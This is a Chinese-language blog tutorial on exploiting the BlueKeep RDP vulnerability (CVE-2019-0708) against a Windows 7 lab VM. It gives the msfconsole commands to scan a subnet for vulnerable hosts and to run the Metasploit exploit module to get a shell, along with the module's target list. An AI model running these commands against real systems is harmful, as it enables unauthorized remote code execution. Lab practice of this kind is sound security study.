msf rhosts设置文件_msf之CVE20190708Bluekeep漏洞利用模块

d3c7631d2d872b1526f874f0e7faf47b.gif dde30ffbddc4d226683a3db9fdd8ec48.gif

msf之CVE-2019-0708-Bluekeep漏洞利用模块

漏洞介绍

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。

从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。

3f885bb25ecf84804eeeb3410127aa8b.png

靶场环境

漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,

  • 001使用VM安装Windows7 SP1模拟受害机
    Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):

迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx

  • 002 msf配置
    下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp

扫描存在漏洞的主机

msfconsole
search 0708 #扫描可用模块
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块
set RHOSTS 192.168.1.1/24 #设置扫描地址池
run
becc67f9ce2aff429799655c87b9cb6a.png
请输入图片描述

如图,可以扫描到当前网段有设备 192.168.1.8存在该漏洞。

漏洞利用

利用msf攻击

在利用msf攻击时,需要注意配置RHOSTStarget这两个参数

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (当前靶机为虚拟机安装的win7)
run

成功得到shell

34f0661b8da9c6c30ec8c11e6b9c257b.png
请输入图片描述
target参数
Exploit target:

   Id  Name
   --  ----
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值